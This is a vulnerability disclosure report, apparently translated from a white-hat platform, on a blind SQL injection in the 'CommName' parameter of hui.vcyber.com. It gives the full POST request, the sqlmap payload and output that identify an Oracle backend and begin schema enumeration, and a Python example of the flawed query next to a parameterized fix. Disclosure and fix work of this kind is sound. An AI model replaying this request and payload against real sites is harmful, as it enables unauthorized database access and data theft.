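2015-06-29: Details reported to the vendor; awaiting vendor response
2015-06-29: Vendor confirmed; details disclosed to the vendor only
2015-07-09: Details disclosed to core white hats and relevant domain experts
2015-07-19: Details disclosed to regular white hats
2015-07-29: Details disclosed to trainee white hats
2015-08-13: Details disclosed to the public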
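Heaven and earth are not benevolent; they treat all things as straw dogs. [HD] In the name of the team, for individual honor, building network security together.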
POST request:
POST /comm/commlistpbl?time=1435561511290 HTTP/1.1
Content-Length: 130
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://hui.vcyber.com:80/
Cookie: ASP.NET_SessionId=myimwlbtpmr1hey2dttswv55; Hm_lvt_dfe63f06e975a06d1c7bd00163a44b8d=1435561512,1435561541; Hm_lpvt_dfe63f06e975a06d1c7bd00163a44b8d=1435561541; HMACCOUNT=BF8F36E9E6A2F87A
Host: hui.vcyber.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

CommName=-1&CommTypeID=&IYN=&PageNums=1&sellPrice=&TJType=&ZCount=
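The CommName parameter is not filtered, which led to this injection.
Data extraction through this injection point is very slow, so I did not continue.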
POST parameter 'CommName' is vulnerable. Do you want to keep testing the others(if any)? [y/N] n
sqlmap identified the following injection points with a total of 81 HTTP(s) requests:
---
Parameter: CommName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CommName=-1%' AND 1404=1404 AND '%'='&CommTypeID=&IYN=&PageNums=1&sellPrice=&TJType=&ZCount=
---
[15:33:16] [INFO] testing MySQL
[15:33:16] [WARNING] the back-end DBMS is not MySQL
[15:33:16] [INFO] testing Oracle
[15:33:18] [INFO] confirming Oracle
[15:33:25] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[15:33:25] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:33:25] [INFO] fetching database (schema) names
[15:33:25] [INFO] fetching number of databases
[15:33:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:33:25] [INFO] retrieved: 27
[15:34:21] [INFO] retrieved: A
[15:35:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
PEX_03020
[15:38:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
0
[15:39:24] [INFO] retrieved: APPQO
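The payload shape in the sqlmap output (`-1%' ... AND '%'='`) suggests CommName is concatenated into a `LIKE '%...%'` pattern. The following is an added example, not code from the report or the vendor: it contrasts that assumed query shape with a bound, wildcard-escaped version. sqlite3 stands in for the Oracle backend so it runs offline; the table, column, rows and function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; the table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comm (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO comm (name) VALUES (?)",
                   [("red tea",), ("green tea",), ("100% juice",), ("gift box-1",)])
    return db

def search_vulnerable(db, comm_name):
    # Assumed shape of the flawed query: input concatenated into the LIKE pattern,
    # so a quote in CommName ends the string literal and the rest is parsed as SQL.
    sql = "SELECT name FROM comm WHERE name LIKE '%" + comm_name + "%'"
    return [row[0] for row in db.execute(sql)]

def escape_like(value, esc="\\"):
    # Neutralise LIKE wildcards so user input is matched literally.
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))

def search_safe(db, comm_name):
    # Bind variable: the input travels as data and is never parsed as SQL.
    sql = "SELECT name FROM comm WHERE name LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(comm_name) + "%"
    return [row[0] for row in db.execute(sql, (pattern,))]

# PROBE_TRUE is the URL-decoded CommName value from the sqlmap output above;
# PROBE_FALSE is a constructed counterpart with a false condition.
PROBE_TRUE = "-1%' AND 1404=1404 AND '%'='"
PROBE_FALSE = "-1%' AND 1404=1405 AND '%'='"

if __name__ == "__main__":
    db = make_db()
    for label, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        # Differing row counts for the two probes are what makes the flaw observable.
        print(label, len(fn(db, PROBE_TRUE)), len(fn(db, PROBE_FALSE)))
```

With the concatenated query the two probes return different row counts; with the bound query both are treated as literal search text and match nothing.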
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-06-29 17:48
Thanks
None yet